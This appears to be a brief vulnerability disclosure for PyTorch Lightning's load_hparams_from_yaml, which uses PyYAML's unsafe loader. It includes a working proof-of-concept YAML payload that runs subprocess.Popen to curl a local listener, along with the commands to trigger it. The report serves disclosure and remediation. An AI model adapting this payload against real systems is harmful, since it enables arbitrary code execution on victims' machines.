There is untrusted YAML Deserialization vulnerability on PyTorchLightning Github repository. PyTorchLightning’s saving.py (core.saving.load_hparams_from_yaml) functionality is calling “yaml.UnsafeLoader” from pyyaml Python library which is not secure method. Because of that, maliciously crafted yaml config file can cause code execution on the victim’s machine.
from pytorch_lightning import core
core.saving.load_hparams_from_yaml("evil.yaml")
- !!python/object/new:yaml.MappingNode
listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1:8080/rce"]]'
state:
tag: !!str dummy
value: !!str dummy
extend: !!python/name:yaml.unsafe_load
python3 -m http.server 8080
python3 poc.py
Maliciously crafted yaml config file can cause code execution on the victim’s machine.